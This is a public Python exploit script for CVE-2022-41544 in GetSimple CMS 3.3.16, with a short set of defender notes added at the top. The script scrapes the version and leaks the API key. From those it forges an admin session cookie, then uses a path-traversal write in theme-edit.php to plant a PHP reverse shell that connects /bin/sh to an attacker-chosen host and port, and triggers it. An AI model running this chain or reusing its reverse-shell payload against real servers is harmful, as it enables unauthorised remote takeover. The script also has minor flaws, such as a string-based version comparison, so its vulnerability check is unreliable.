# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Date: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544
#
# Public proof-of-concept for CVE-2022-41544. The chain as written in
# main() is: read the version string from admin/index.php, read the API
# key from data/other/authorization.xml, derive the admin session cookie
# from version + API key, fetch the theme-edit.php nonce, POST to
# theme-edit.php with a traversing `edited_file`, then GET the written file.
#
# Defender notes (each observable corresponds to one request below):
#   - an unauthenticated GET for data/other/authorization.xml is the key
#     leak; denying web access to data/ removes the precondition;
#   - a POST to admin/theme-edit.php whose `edited_file` contains "../"
#     is the write primitive; a new .php file outside the theme folder
#     is the on-disk artifact;
#   - the admin cookie is reconstructible from public data alone, so a
#     leaked key should be treated as a full admin credential compromise.

import sys
import hashlib
import re
import requests
from xml.etree import ElementTree
from threading import Thread  # unused in this script
import telnetlib  # unused in this script

# ANSI colour escapes for console output; yellow/blue are unused below.
purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"


def print_the_banner():
    """Print the ASCII banner in purple, then reset the terminal colour."""
    # Banner whitespace was collapsed in the published copy; reproduced as-is.
    print(purple + ''' CCC V V EEEE22 000 22 2244115555 44 44 CV V E22 000 22 22 44 111544 44 C V VEEE--- 20 0 0 22--- 4444115554444 4444 CV V E 2 00022411 544 CCCVEEEE 22220002222 22224 11l1 555 44 '''+ reset)


def get_version(target, path):
    """Return the version string scraped from admin/index.php, or None.

    The value is read from the `?v=` query of the jquery.getsimple.js
    script tag on the (unauthenticated) admin login page. The version is
    needed later because the session cookie name is derived from it.
    """
    r = requests.get(f"http://{target}{path}admin/index.php")
    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
    if match:
        version = match.group(1)
        # Plain string comparison against the last affected release.
        if version <= "3.3.16":
            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
        else:
            print ("This is not vulnrable to this CVE")
        return version
    return None


def api_leak(target, path):
    """Return the API key from data/other/authorization.xml, or None.

    This request is the root cause: the XML file is fetched directly over
    HTTP with no credentials, and its first child element holds the key.
    A web-server rule denying access to data/ blocks this step.
    """
    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
    if r.ok:
        tree = ElementTree.fromstring(r.content)
        apikey = tree[0].text
        print(f"[+] apikey obtained {apikey}")
        return apikey
    return None


def set_cookies(username, version, apikey):
    """Build request headers carrying a forged admin session cookie.

    Both the cookie name (sha1 of "getsimple_cookie_" + version without
    dots + apikey) and the cookie value (sha1 of username + apikey) depend
    only on values an unauthenticated client can obtain, which is why the
    key leak alone yields an admin session.
    """
    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
    headers = {
        'Content-Type':'application/x-www-form-urlencoded',
        'Cookie': cookies
    }
    return headers


def get_csrf_token(target, path, headers):
    """Return the hidden `nonce` field from admin/theme-edit.php, or None.

    Uses the forged cookie headers; the nonce is required by the POST in
    upload_shell(). A 200 on this page with a cookie that was never issued
    by a login is itself a detectable anomaly.
    """
    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
    m = re.search('nonce" type="hidden" value="(.*)"', r.text)
    if m:
        print("[+] csrf token obtained")
        return m.group(1)
    return None


def upload_shell(target, path, headers, nonce, shell_content):
    """POST `shell_content` to theme-edit.php with a traversing edited_file.

    theme-edit.php writes `content` to `edited_file`; the "../" prefix
    escapes the theme directory. Success is judged only by HTTP 200, and
    request failures are reported rather than raised.
    """
    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
    payload = {
        'content': shell_content,
        'edited_file': '../shell.php',
        'nonce': nonce,
        'submitsave': 1
    }
    try:
        response = requests.post(upload_url, headers=headers, data=payload)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
        else:
            print("(-) Shell upload failed!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while uploading the shell:", e)


def shell_trigger(target, path):
    """GET the written shell.php once so the server executes it.

    Only the HTTP status is checked; request errors are printed, not raised.
    """
    url = f"http://{target}{path}/shell.php"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("[+] Webshell trigged successfully!")
        else:
            print("(-) Failed to visit the page!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while visiting the page:", e)


def main():
    """Parse argv, run the steps in order, and stop at the first failure.

    argv: <target> <path> <ip:port> <username>. `path` is normalised to end
    with "/". Each step returns None on failure, which aborts the run.
    """
    if len(sys.argv) != 5:
        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
        return
    target = sys.argv[1]
    path = sys.argv[2]
    if not path.endswith('/'):
        path += '/'
    ip, port = sys.argv[3].split(':')
    username = sys.argv[4]
    # PHP payload written by upload_shell(); reproduced as published.
    shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """
    version = get_version(target, path)
    if not version:
        print("(-) could not get version")
        return
    apikey = api_leak(target, path)
    if not apikey:
        print("(-) could not get apikey")
        return
    headers = set_cookies(username, version, apikey)
    nonce = get_csrf_token(target, path, headers)
    if not nonce:
        print("(-) could not get nonce")
        return
    upload_shell(target, path, headers, nonce, shell_content)
    shell_trigger(target, path)


if __name__ == '__main__':
    print_the_banner()
    main()